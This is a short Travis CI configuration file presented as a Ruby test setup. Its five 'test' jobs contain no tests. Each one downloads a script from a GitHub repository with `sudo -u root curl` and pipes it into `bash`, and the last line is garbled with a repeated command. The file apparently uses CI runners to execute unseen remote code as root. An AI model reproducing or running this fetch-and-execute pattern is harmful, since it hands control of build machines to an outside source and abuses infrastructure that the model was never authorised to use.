language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://github.com/Lanu12/Lalan/blob/main/Anu | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://github.com/Lanu12/Lalan/blob/main/Anu | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://github.com/Lanu12/Lalan/blob/main/Anu | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://github.com/Lanu12/Lalan/blob/main/Anu | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl sudo -u root curl https://github.com/Lanu12/Lalan/blob/main/Anu | bash
